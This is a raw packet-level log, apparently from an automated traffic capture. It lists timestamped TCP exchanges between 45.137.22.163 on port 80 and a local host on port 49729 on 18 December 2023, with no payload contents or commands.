                                        Dec 18, 2023 14:31:05.481590986 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481610060 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481621981 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481647015 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481647968 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.481678963 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.481695890 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481707096 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481745958 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.481767893 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481791019 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481820107 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481837988 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.481869936 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481882095 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481919050 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.482095957 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482177019 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482242107 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482247114 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.482273102 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482286930 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482300043 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482317924 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.482340097 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482355118 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482362032 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.482367992 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482412100 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482419014 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.482459068 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.482460976 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482474089 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482485056 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482513905 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482516050 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.482551098 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482598066 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.482633114 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482700109 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482713938 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482743979 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.482774973 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482789040 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482820988 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482822895 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.482852936 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.482866049 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482867002 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.482923985 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482937098 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482949018 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482959986 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.482975960 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.482991934 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.483021975 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.483036995 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.483047962 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.483078957 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.483099937 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.483143091 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.483144999 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.483158112 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.483192921 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.483213902 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.483227015 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.483237982 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.483261108 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.483283043 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.483289957 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.483303070 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.483340025 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.483351946 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.483362913 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.483405113 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.717336893 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.717358112 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.717417002 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.717466116 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.717530966 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.717560053 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.717608929 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.717654943 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.717703104 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.717730045 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.717789888 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.717822075 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.717835903 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.717899084 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.717953920 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.718071938 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718121052 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718132973 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718166113 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.718189955 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718271017 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718286037 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718327045 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718328953 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.718374014 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718374014 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.718431950 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718445063 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718470097 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718476057 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.718519926 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.718542099 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718555927 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718597889 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718600035 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.718611002 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718645096 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.718667984 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718697071 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718744993 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.718754053 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718797922 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718811035 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718837976 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718846083 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.718869925 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718880892 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.718894005 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.718950987 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.718956947 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.719023943 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.719043970 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.719079971 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.719100952 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.719163895 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.719208956 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.719240904 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.719341993 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.719389915 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.719410896 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.719500065 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.719547987 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.719562054 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.719636917 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.719681978 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.719733000 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.719784021 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.719825029 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.719829082 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.719901085 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.719922066 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.719944000 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.720022917 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.720067978 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.720089912 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.720187902 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.720237017 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.720278978 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.720376968 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.720422983 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.720424891 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.720499039 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.720545053 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.720567942 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.720690012 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.720733881 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.720737934 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.720798016 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.720861912 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.720910072 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.720932007 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.720984936 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721012115 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721029043 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.721101999 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721179008 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721203089 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721225023 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.721285105 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721328020 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.721347094 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721405029 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721448898 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.721457005 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721520901 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721555948 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721566916 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.721570015 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721611023 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721617937 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.721625090 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721637964 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721669912 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.721705914 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721755981 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.721779108 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721832037 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721843958 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721880913 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.721944094 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721956968 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.721995115 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.722007990 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722033024 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722074986 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.722076893 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722151041 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722189903 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722196102 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.722250938 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722265005 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722306967 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.722323895 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722368002 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722372055 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.722383022 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722425938 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.722448111 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722531080 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722548008 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722577095 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722578049 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.722623110 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.722645044 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722670078 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722714901 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.722737074 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722749949 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722820044 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722832918 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722862959 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.722943068 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722974062 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.722990990 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.723051071 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723094940 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.723118067 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723141909 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723186970 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.723247051 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723311901 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723361015 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.723367929 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723432064 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723481894 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.723483086 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723534107 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723578930 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.723598957 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723632097 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723675013 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723678112 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.723778963 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723793030 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723823071 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.723836899 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723851919 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723861933 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723881960 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.723903894 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723929882 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723943949 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.723965883 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.723979950 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.724011898 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.724035025 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.724078894 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.724091053 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.724104881 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.724128962 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.724142075 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.724149942 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.724196911 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.724209070 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.724276066 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.724289894 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.724322081 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.724322081 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.779117107 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.954570055 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.954624891 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.954663992 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.954679012 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.954703093 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.954745054 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.954755068 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.954914093 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.954977036 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.955064058 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.955080986 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.955121994 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.955230951 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.955245018 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.955411911 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.955425978 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.955476999 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.955601931 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.955645084 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.955825090 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.955837965 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.955873013 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.956013918 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.956027031 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.956065893 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.956187010 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.956366062 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.956378937 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.956388950 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.956401110 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.956412077 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.956439972 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.956554890 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.956568003 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.956607103 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.956628084 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.956825972 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.956839085 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.956875086 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.956996918 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.957010031 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.957041025 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.957149982 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.957164049 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.957195044 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.957379103 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.957390070 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.957405090 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.957422972 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.957564116 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.957577944 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.957588911 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.957611084 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.957650900 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.957746029 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.957916021 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.957930088 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.957963943 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.958112955 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.958126068 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.958142996 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.958153963 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.958184958 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.958297968 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.958314896 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.958359957 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.958472013 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.958525896 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.958539009 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.958576918 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.958753109 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.958765984 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.958798885 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.958815098 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.958859921 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.959026098 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.959038973 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.959079981 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.959182978 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.959196091 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.959209919 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.959237099 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.959352016 CET804972945.137.22.163192.168.2.4
